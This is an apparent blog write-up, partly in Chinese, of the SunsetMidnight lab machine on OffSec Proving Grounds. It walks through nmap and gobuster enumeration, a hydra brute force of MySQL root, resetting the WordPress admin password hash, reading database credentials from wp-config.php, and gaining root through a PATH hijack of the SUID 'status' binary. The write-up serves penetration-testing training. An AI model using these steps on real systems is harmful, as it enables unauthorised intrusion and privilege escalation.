OSCP-PG-SunsetMidnight

Mkd1R 2022-5-24 76 5/24

#Enumeration

-nmap

# nmap -vvv 192.168.57.88
PORT     STATE SERVICE REASON
22/tcp   open  ssh     syn-ack ttl 63
80/tcp   open  http    syn-ack ttl 63
3306/tcp open  mysql   syn-ack ttl 63

-nmap2

# nmap -p22,80,3306 -A 192.168.57.88
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 9c:fe:0b:8b:8d:15:e7:72:7e:3c:23:e5:86:55:51:2d (RSA)
|   256 fe:eb:ef:5d:40:e7:06:67:9b:63:67:f8:d9:7e:d3:e2 (ECDSA)
|_  256 35:83:68:2c:33:8b:b4:6c:24:21:20:0d:52:ed:cd:16 (ED25519)
80/tcp   open  http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
| http-robots.txt: 1 disallowed entry 
|_/wp-admin/
|_http-title: Did not follow redirect to http://sunset-midnight/
3306/tcp open  mysql   MySQL 5.5.5-10.3.22-MariaDB-0+deb10u1
| mysql-info: 
|   Protocol: 10
|   Version: 5.5.5-10.3.22-MariaDB-0+deb10u1
|   Thread ID: 16
|   Capabilities flags: 63486
|   Some Capabilities: Speaks41ProtocolNew, LongColumnFlag, SupportsLoadDataLocal, ConnectWithDatabase, IgnoreSpaceBeforeParenthesis, SupportsTransactions, IgnoreSigpipes, FoundRows, DontAllowDatabaseTableColumn, SupportsCompression, InteractiveClient, Support41Auth, Speaks41ProtocolOld, ODBCClient, SupportsMultipleResults, SupportsAuthPlugins, SupportsMultipleStatments
|   Status: Autocommit
|   Salt: )P9h%yX+kZb]-g@H*6oP
|_  Auth Plugin Name: mysql_native_password
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 2.6.18 (91%), Linux 4.15 - 5.6 (90%), Linux 2.6.32 (90%), Linux 2.6.32 or 3.10 (90%), Linux 2.6.39 (90%), Linux 3.10 - 3.12 (90%), Linux 3.4 (90%), Linux 3.7 (90%), Linux 4.4 (90%), Synology DiskStation Manager 5.1 (90%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

#Web enumeration|Wordpress

# gobuster dir -u http://192.168.57.88 -t 20 -w /usr/share/wordlists/dirb/big.txt -x php,html,txt,json -o gbig.txt
/.htpasswd            (Status: 403) [Size: 278]
/.htaccess.json       (Status: 403) [Size: 278]
/!                    (Status: 301) [Size: 0] [--> http://192.168.57.88/]
/.htpasswd.php        (Status: 403) [Size: 278]                          
/.htaccess.php        (Status: 403) [Size: 278]                          
/.htpasswd.html       (Status: 403) [Size: 278]                          
/.htaccess.html       (Status: 403) [Size: 278]                          
/.htpasswd.txt        (Status: 403) [Size: 278]                          
/.htaccess            (Status: 403) [Size: 278]                          
/.htaccess.txt        (Status: 403) [Size: 278]                          
/.htpasswd.json       (Status: 403) [Size: 278]                          
/0000                 (Status: 301) [Size: 0] [--> http://192.168.57.88/0000/]
/0                    (Status: 200) [Size: 61796]                             
/2020                 (Status: 301) [Size: 0] [--> http://192.168.57.88/2020/]
/About                (Status: 301) [Size: 0] [--> http://192.168.57.88/About/]
/Blog                 (Status: 301) [Size: 0] [--> http://192.168.57.88/Blog/] 
/Contact              (Status: 301) [Size: 0] [--> http://192.168.57.88/Contact/]
/Home                 (Status: 200) [Size: 61796]                                
/about                (Status: 301) [Size: 0] [--> http://192.168.57.88/about/]  
/admin                (Status: 302) [Size: 0] [--> http://sunset-midnight/wp-admin/]                                                                                                                                                        
/asdfjkl;             (Status: 301) [Size: 0] [--> http://192.168.57.88/asdfjkl]                                                                                                                                                            
/atom                 (Status: 301) [Size: 0] [--> http://192.168.57.88/feed/atom/]                                                                                                                                                         
/blog                 (Status: 301) [Size: 0] [--> http://192.168.57.88/blog/]                                                                                                                                                              
/coffee               (Status: 301) [Size: 0] [--> http://192.168.57.88/coffee/]    
/comment-page-1       (Status: 301) [Size: 0] [--> http://192.168.57.88/]           
/comment-page-3       (Status: 301) [Size: 0] [--> http://192.168.57.88/]           
/comment-page-4       (Status: 301) [Size: 0] [--> http://192.168.57.88/]           
/comment-page-5       (Status: 301) [Size: 0] [--> http://192.168.57.88/]           
/comment-page-6       (Status: 301) [Size: 0] [--> http://192.168.57.88/]           
/comment-page-2       (Status: 301) [Size: 0] [--> http://192.168.57.88/]           
/contact              (Status: 301) [Size: 0] [--> http://192.168.57.88/contact/]   
/dashboard            (Status: 302) [Size: 0] [--> http://sunset-midnight/wp-admin/]
/embed                (Status: 200) [Size: 18968]                                   
/favicon.ico          (Status: 302) [Size: 0] [--> http://sunset-midnight/wp-includes/images/w-logo-blue-white-bg.png]
/feed                 (Status: 301) [Size: 0] [--> http://192.168.57.88/feed/]                                        
/fixed!               (Status: 301) [Size: 0] [--> http://192.168.57.88/fixed]                                        
/home                 (Status: 200) [Size: 61796]                                                                     
/index.php            (Status: 200) [Size: 61796]                                                                     
/license.txt          (Status: 200) [Size: 19915]                                                                     
/login                (Status: 302) [Size: 0] [--> http://sunset-midnight/wp-login.php]                               
/page1                (Status: 200) [Size: 61796]                                                                     
/rdf                  (Status: 301) [Size: 0] [--> http://192.168.57.88/feed/rdf/]                                    
/readme.html          (Status: 200) [Size: 7278]                                                                      
/robots.txt           (Status: 200) [Size: 67]                                                                        
/robots.txt           (Status: 200) [Size: 67]                                                                        
/rss                  (Status: 301) [Size: 0] [--> http://192.168.57.88/feed/]                                        
/rss2                 (Status: 301) [Size: 0] [--> http://192.168.57.88/feed/]                                        
/sample-page          (Status: 301) [Size: 0] [--> http://192.168.57.88/sample-page/]                                 
Progress: 78960 / 102350 (77.15%)                                                                                    [ERROR] 2022/05/24 15:02:46 [!] context deadline exceeded (Client.Timeout or context cancellation while reading body)
/server-status        (Status: 403) [Size: 278]                                                                       
/workfiles.html       (Status: 500) [Size: 2836]                                                                      
/wp-admin             (Status: 301) [Size: 317] [--> http://192.168.57.88/wp-admin/]                                  
/wp-content           (Status: 301) [Size: 319] [--> http://192.168.57.88/wp-content/]                                
/wp-feed.php          (Status: 301) [Size: 0] [--> http://sunset-midnight/feed/]                                      
/wp-config.php        (Status: 200) [Size: 0]                                                                         
/wp-includes          (Status: 301) [Size: 320] [--> http://192.168.57.88/wp-includes/]                               
/wp-rss2.php          (Status: 301) [Size: 0] [--> http://sunset-midnight/feed/]                                      
/wp-register.php      (Status: 301) [Size: 0] [--> http://sunset-midnight/wp-login.php?action=register]               
/wp-login.php         (Status: 200) [Size: 4922]                                                                      
/xmlrpc.php           (Status: 405) [Size: 42]                                                                        

#Exploitation

-hydra

# hydra -l root -P /usr/share/wordlists/rockyou.txt sunset-midnight mysql -t 10
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-05-24 14:52:43
[INFO] Reduced number of tasks to 4 (mysql does not like many parallel connections)
[DATA] max 4 tasks per 1 server, overall 4 tasks, 14344399 login tries (l:1/p:14344399), ~3586100 tries per task
[DATA] attacking mysql://sunset-midnight:3306/
[3306][mysql] host: sunset-midnight   login: root   password: robert
1 of 1 target successfully completed, 1 valid password found

-mysql

获取mysql root修改wordpress后台用户密码

MariaDB [wordpress_db]> select user_login,user_pass from wp_users;
+------------+------------------------------------+
| user_login | user_pass                          |
+------------+------------------------------------+
| admin      | $P$BaWk4oeAmrdn453hR6O6BvDqoF9yy6/ |
+------------+------------------------------------+
1 row in set (0.290 sec)

MariaDB [wordpress_db]> update wp_users set user_pass="e10adc3949ba59abbe56e057f20f883e" where user_login='admin';
Query OK, 1 row affected (0.293 sec)
Rows matched: 1  Changed: 1  Warnings: 0

MariaDB [wordpress_db]> flush privileges;
Query OK, 0 rows affected (0.293 sec)

MariaDB [wordpress_db]> select user_login,user_pass from wp_users;
+------------+----------------------------------+
| user_login | user_pass                        |
+------------+----------------------------------+
| admin      | e10adc3949ba59abbe56e057f20f883e |
+------------+----------------------------------+
1 row in set (0.290 sec)

#Escalation

我尝试直接在404.php反弹shell,但是未能成功,随后我重新下载了一个相同的主题,并且事先将shell写入404.php压缩为zip
https://wordpress.org/themes/twentyseventeen/

#Changing user

随后我在/var/www/html/wordpress/wp-config.php中找到了jose用户的密码
define( 'DB_NAME', 'wordpress_db' );

/** MySQL database username */
define( 'DB_USER', 'jose' );

/** MySQL database password */
define( 'DB_PASSWORD', '645dc5a8871d2a4269d4cbe23f6ae103' );

/** MySQL hostname */
define( 'DB_HOST', 'localhost' );

/** Database Charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8' );

/** The Database Collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );
随后我成为了jose用户

#SUID

jose@midnight:/var/www/html/wordpress$ find / -perm -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
/usr/bin/su
/usr/bin/sudo
/usr/bin/fusermount
/usr/bin/status
/usr/bin/chfn
/usr/bin/passwd
/usr/bin/chsh
/usr/bin/umount
/usr/bin/newgrp
/usr/bin/mount
/usr/bin/gpasswd
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
在具有SUID权限的命令中我们可以利用status来进行提升权限
jose@midnight:/var/www/html/wordpress$ cd /tmp

jose@midnight:/tmp$ touch service

jose@midnight:/tmp$ echo '/bin/sh' > service
jose@midnight:/tmp$ chmod 755 service

jose@midnight:/tmp$ export PATH=/tmp/:$PATH

jose@midnight:/tmp$ /usr/bin/status
/usr/bin/status
# id
id
uid=0(root) gid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),111(bluetooth),1000(jose)
- THE END -

Mkd1R

7月02日21:56

最后修改:2022年7月2日
0

非特殊说明,本博所有文章均为博主原创。